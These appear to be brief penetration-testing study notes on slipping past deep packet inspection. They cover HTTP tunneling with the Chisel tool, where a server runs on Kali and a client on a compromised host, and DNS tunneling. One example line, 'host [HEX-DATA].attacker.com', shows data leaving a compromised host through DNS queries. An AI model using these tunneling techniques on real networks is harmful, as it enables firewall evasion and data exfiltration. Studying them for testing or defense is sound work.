Deep Packet Instpection (DPI)
DPI analyzes the content of TCP packets to determine weather or not a packet is allowed to pass the firewall
might be used to ban outgoing ssh traffic
HTTP tunneling
Sending TCP traffic through an HTTP tunnel
Chisel
tool to tunnel TCP through HTTP
reverse port forwarding
server on kali
client on compromised host
allows
DNS tunneling
DNS can be used to tunnel data. Attacker must control a DNS server (e.g. for attacker.com).
Concept:
compromised host can send data to dns server via DNS queries (e.g. via: host [HEX-DATA].attacker.com)
server can send data to compromised host via DNS txt entries (there are also other options)
this can be used to establish a tunnel
Zuletzt geändertvor einem Jahr